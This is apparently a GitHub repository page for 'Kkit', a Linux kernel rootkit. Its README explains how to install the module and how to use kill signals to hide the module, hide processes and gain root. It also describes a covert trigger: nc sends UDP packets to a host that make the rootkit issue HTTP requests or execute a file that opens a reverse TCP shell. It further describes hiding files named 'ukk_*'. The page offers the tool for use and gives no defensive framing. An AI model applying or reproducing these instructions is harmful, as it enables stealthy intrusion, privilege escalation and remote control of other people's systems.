Skip to content

Alex0Young/Kkit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

7 Commits
example
example
 
 
test
test
 
 
Makefile
Makefile
 
 
Readme.md
Readme.md
 
 
kkit.c
kkit.c
 
 
kkit.h
kkit.h
 
 

Repository files navigation

KKIT

A Linux Kernel RootKit

Install

make

insmod kkit.ko

USE

hide/show the module:

kill -62 0

hide/show process:

kill -60 pid

getroot:

kill -61 0

heartbeat

Trigger to send a http request:

# Server:
nc -p 1338 123.123.123.123 50005 -u
fdsfasd

If the kkit received a udp packet sended from 1338 port to 50005 port, the kkit will send a http packet to the targeted server ip

#server:
python3 -m http.server 50002

exec_cmd

#Server
nc -p 1339 123.123.123.123 50005 -u
fsdfsdaf

If the kkit received a udp packet sended from 1339 port to 50005 port, the kkit will exexcve /tmp/ukk_tc If the ukk_tc is a binary will establish reverse tcp connection, the kkit can establish reverse tcp connection

debug_mode

If want to see the running debug log:

#Server
nc -p 1340 123.123.123.123 50005 -u
fsdfsdaf

hide file

If the filename is "ukk_*", the file will be hided.

About

A Linux kernel rootkit

Resources

Readme
Activity

Stars

0 stars

Watchers

1 watching

Forks

0 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages